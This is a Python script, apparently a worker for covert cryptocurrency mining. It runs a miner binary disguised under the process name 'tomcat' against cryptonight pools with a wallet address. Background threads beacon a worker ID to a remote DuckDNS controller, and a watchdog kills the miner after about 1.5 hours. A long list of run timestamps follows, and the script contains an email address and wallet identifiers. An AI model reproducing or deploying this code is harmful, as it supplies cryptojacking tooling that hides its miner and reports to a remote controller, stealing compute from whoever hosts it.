import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:37:05.566686
#2018-02-17 17:25:06.920597
#2018-02-17 19:14:07.136708
#2018-02-17 21:04:07.459984
#2018-02-17 22:49:06.479334
#2018-02-18 00:34:06.286847
#2018-02-18 02:24:05.364839
#2018-02-18 04:11:04.280933
#2018-02-18 06:02:04.886017
#2018-02-18 07:52:06.825363
#2018-02-18 09:41:06.998972
#2018-02-18 11:26:07.058945
#2018-02-18 13:13:01.886271
#2018-02-18 15:02:05.131203
#2018-02-18 16:50:07.271581
#2018-02-18 18:38:03.495829
#2018-02-18 20:26:05.783111
#2018-02-18 22:12:07.975734
#2018-02-19 00:01:03.962820
#2018-02-19 01:47:01.333512
#2018-02-19 03:36:05.583679
#2018-02-19 05:21:06.350539
#2018-02-19 07:08:03.797166
#2018-02-19 08:57:06.797284
#2018-02-19 10:47:08.443402
#2018-02-19 12:35:06.951038
#2018-02-19 14:22:08.495023
#2018-02-19 16:09:08.750342
#2018-02-19 17:56:09.673902
#2018-02-19 19:43:07.867647
#2018-02-19 21:32:02.425055
#2018-02-19 23:18:01.860329
#2018-02-20 01:04:04.137550
#2018-02-20 02:52:05.641721
#2018-02-20 04:41:07.695882
#2018-02-20 06:25:08.481103
#2018-02-20 08:10:06.565863
#2018-02-20 09:55:06.785361
#2018-02-20 11:40:04.066704
#2018-02-20 13:28:01.679844
#2018-02-20 15:12:08.626046
#2018-02-20 16:58:08.317996
#2018-02-20 18:47:07.417696
#2018-02-20 20:36:07.263651
#2018-02-20 22:22:01.454207
#2018-02-21 00:02:07.296241
#2018-02-21 01:47:05.928337
#2018-02-21 03:34:08.048638
#2018-02-21 05:23:05.895464
#2018-02-21 07:11:04.518807
#2018-02-21 08:57:06.418217
#2018-02-21 10:44:01.298291
#2018-02-21 12:32:04.455220
#2018-02-21 14:19:05.783951
#2018-02-21 16:07:07.757356
#2018-02-21 17:58:07.967895
#2018-02-21 19:44:09.446250
#2018-02-21 21:33:06.131756
#2018-02-21 23:18:06.791690
#2018-02-22 01:09:05.183832
#2018-02-22 02:58:03.714626
#2018-02-22 04:45:06.007562
#2018-02-22 06:31:06.866296
#2018-02-22 08:18:06.602228
#2018-02-22 10:07:05.771195
#2018-02-22 11:52:01.464508
#2018-02-22 13:38:08.051444
#2018-02-22 15:25:09.062552
#2018-02-22 17:11:10.081525
#2018-02-22 18:57:08.667536
#2018-02-22 20:49:02.098782
#2018-02-22 22:34:09.968315
#2018-02-23 00:19:06.531335
#2018-02-23 02:08:06.613670
#2018-02-23 04:03:06.393768
#2018-02-23 05:49:01.968813
#2018-02-23 07:46:05.280107
#2018-02-23 09:48:03.974700
#2018-02-23 11:55:03.046484
#2018-02-23 13:43:08.613190
#2018-02-23 15:31:08.786421
#2018-02-23 17:21:01.816861
#2018-02-23 19:08:01.338703
#2018-02-23 20:53:02.196519
#2018-02-23 22:40:06.247626
#2018-02-24 00:28:06.656441
#2018-02-24 02:19:05.338651
#2018-02-24 04:10:09.061411
#2018-02-24 05:58:06.096126
#2018-02-24 07:45:01.554361
#2018-02-24 09:29:05.108862
#2018-02-24 11:23:01.879321
#2018-02-24 13:12:07.122216
#2018-02-24 15:02:06.171860
#2018-02-24 16:52:01.806283
#2018-02-24 18:40:04.537689
#2018-02-24 20:31:06.309031
#2018-02-24 22:30:08.658430
#2018-02-25 01:40:04.117636
#2018-02-25 05:22:05.268755
#2018-02-25 11:34:04.383369